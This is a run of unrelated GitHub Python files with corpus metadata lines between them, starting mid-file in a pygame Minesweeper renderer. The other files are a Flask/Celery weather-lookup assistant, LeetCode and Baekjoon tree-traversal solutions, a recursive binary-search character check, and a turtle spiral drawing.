self.window.blit(self.images[11], (r*self.TILE_SIZE, c*self.TILE_SIZE))
elif c_tile.hidden:
self.window.blit(self.images[10], (r*self.TILE_SIZE, c*self.TILE_SIZE))
else:
self.window.blit(self.images[self.tile_board[r][c].value], (r*self.TILE_SIZE, c*self.TILE_SIZE))
pygame.display.update() | mjd-programming/Minesweeper | minesweeper_game.py | minesweeper_game.py | py | 4,549 | python | en | code | 0 | github-code | 36 |
34715801253 | from __future__ import absolute_import
from os import environ
import json
from flask import Flask, jsonify, request
import settings
from celery import Celery
import urllib2
app = Flask(__name__)
app.config.from_object(settings)
'''
==========================================
============= CELERY Section =============
==========================================
'''
def make_celery(app):
celery = Celery(app.import_name, backend='amqp', broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
celery = make_celery(app)
@celery.task(name='tasks.currentHomeTemp')
def currentHomeTemp():
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/NY/Whitesboro.json')
json_string = f.read()
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature in %s is: %s" % (location, temp_f)
@celery.task(name='tasks.currentZipcodeTemp')
def currentZipcodeTemp(zipcode):
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/' + zipcode + '.json')
json_string = f.read()
parsed_json = json.loads(json_string)
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature at zipcode %s is: %s" % (zipcode, temp_f)
@celery.task(name="tasks.add")
def add(x, y):
return x + y
'''
==========================================
============= FLASK Section ==============
==========================================
'''
@app.route('/')
@app.route('/myassistant')
@app.route('/myassistant/index')
@app.route('/myassistant/index.html')
def index():
return 'Hello World!!'
@app.route("/myassistant/test")
def hello_world(x=16, y=16):
x = int(request.args.get("x", x))
y = int(request.args.get("y", y))
res = add.apply_async((x, y))
return generateTaskIdJson(res)
@app.route("/myassistant/result/<task_id>")
def show_result(task_id):
retval = add.AsyncResult(task_id).get(timeout=1.0)
return repr(retval)
@app.route('/myassistant/weather/home/temp/current')
def homeWeather():
res = currentHomeTemp.apply_async()
return generateTaskIdJson(res)
@app.route('/myassistant/weather/<zipcode>/temp/current')
def currentTempAtZip(zipcode):
res = currentZipcodeTemp.delay(zipcode)
return generateTaskIdJson(res)
'''
==========================================
=========== UTILITY Section ==============
==========================================
'''
def generateTaskIdJson(taskResult):
context = {"id": taskResult.task_id,
"url": 'http://' + app.config['CALLBACK_IP']
+ ':'
+ str(app.config['CALLBACK_PORT'])
+ '/myassistant/result/'
+ taskResult.task_id}
return jsonify(context)
'''
==========================================
============== MAIN Section ==============
==========================================
'''
if __name__ == "__main__":
port = int(environ.get("PORT", app.config['LISTEN_PORT']))
app.run(host=app.config['LISTEN_ADDRESS'], port=port, debug=True) | elihusmails/myassistant | src/app/tasks.py | tasks.py | py | 3,707 | python | en | code | 0 | github-code | 36 |
22704609724 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def zigzagLevelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
level = [root]
res = []
res2 = []
level2 = 0
while level:
queue = []
level2 += 1
for i in level:
res.append(i.val)
if i.right:
queue.append(i.right)
if i.left:
queue.append(i.left)
level = queue
res = res[::-1] if level2 % 2 == 1 else res
res2.append(res)
res = []
return res2
| CHENG-KAI/Leetcode | 103_binary_tree_zigzag_level_order_traversal.py | 103_binary_tree_zigzag_level_order_traversal.py | py | 873 | python | en | code | 0 | github-code | 36 |
29903913111 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 11 18:22:46 2020
@author: Zamberlam
"""
def isIn(char, aStr):
'''
char: a single character
aStr: an alphabetized string
returns: True if char is in aStr; False otherwise
'''
if aStr == '':
return False
if len(aStr) == 1:
return aStr == char
midpos = len(aStr) // 2
midchar = aStr[midpos]
if char == midchar:
return True
elif char < midchar:
return isIn(char, aStr[:midpos])
else:
return isIn(char, aStr[midpos:]) | FZamberlam/MITx-6.00.1x-Python | Week_2_-_Simple_Programs/Exercises/isIn.py | isIn.py | py | 637 | python | en | code | 0 | github-code | 36 |
13780023529 | import sys
sys.setrecursionlimit(10 ** 9)
def preorder(root):
print(root, end = "")
left = tree[root][0]
right = tree[root][1]
if left != ".":
preorder(left)
if right != ".":
preorder(right)
def inorder(root):
left = tree[root][0]
right = tree[root][1]
if left != ".":
inorder(left)
print(root, end = "")
if right != ".":
inorder(right)
def postorder(root):
left = tree[root][0]
right = tree[root][1]
if left != ".":
postorder(left)
if right != ".":
postorder(right)
print(root, end = "")
tree = dict()
for _ in range(int(sys.stdin.readline().strip())):
root, left, right = sys.stdin.readline().strip().split()
tree[root] = [left, right]
preorder('A')
print()
inorder('A')
print()
postorder('A')
| Yangseyeon/BOJ | 02. Silver/1991.py | 1991.py | py | 831 | python | en | code | 0 | github-code | 36 |
13823173820 | # we are going to make 3D spiral in vs code using python
import turtle as dk
import colorsys
dk.bgcolor('black')
dk.speed('fastest')
dk.pensize(2)
hue=0.0
dk.hideturtle()
for i in range(500):
color=colorsys.hls_to_rgb(hue,0.6,1)
dk.pencolor(color)
dk.fd(i)
dk.rt(98.5)
dk.circle(100)
hue+=0.005
dk.exitonclick()
# now run the code
| DRKAFLE123/allpydraw | pydraw/spiral.py | spiral.py | py | 358 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.